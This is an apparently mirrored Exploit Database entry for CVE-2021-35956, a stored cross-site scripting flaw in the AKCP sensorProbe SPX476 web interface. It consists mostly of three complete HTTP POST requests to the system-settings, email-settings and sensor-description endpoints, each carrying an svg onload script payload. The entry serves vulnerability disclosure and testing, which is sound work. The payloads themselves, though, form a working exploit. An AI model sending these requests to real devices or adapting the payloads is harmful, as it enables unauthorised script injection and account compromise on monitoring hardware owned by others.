AKCP sensorProbe SPX476 – ‘Multiple’ Cross-Site Scripting (XSS)

• Exploit Database
• 121 阅读

• 作者： Tyler Butler
  日期： 2021-07-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50080/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  # Exploit Title: AKCP sensorProbe SPX476 - &apos;Multiple&apos; Cross-Site Scripting (XSS) # Date: 07-01-2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www.akcp.com/ # Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/ # Advisory: https://tbutler.org/2021/06/28/cve-2021-35956 # Version: < SP480-20210624 # CVE: CVE-2021-35956   # Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.     1) Stored Cross-Site Scripting via System Settings   POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close   _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert<code>xss</code>>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save   2) Stored Cross-Site Scripting via Email Settings   POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close     _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert<code>xxss</code>>&_PS05_4=&sbt2=Save   3) Stored Cross-Site Scripting via Sensor Description   POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close   _WT00-IX="><svg/onload=alert<code>xss</code>>&_WT03-IX=2&sbt1=Save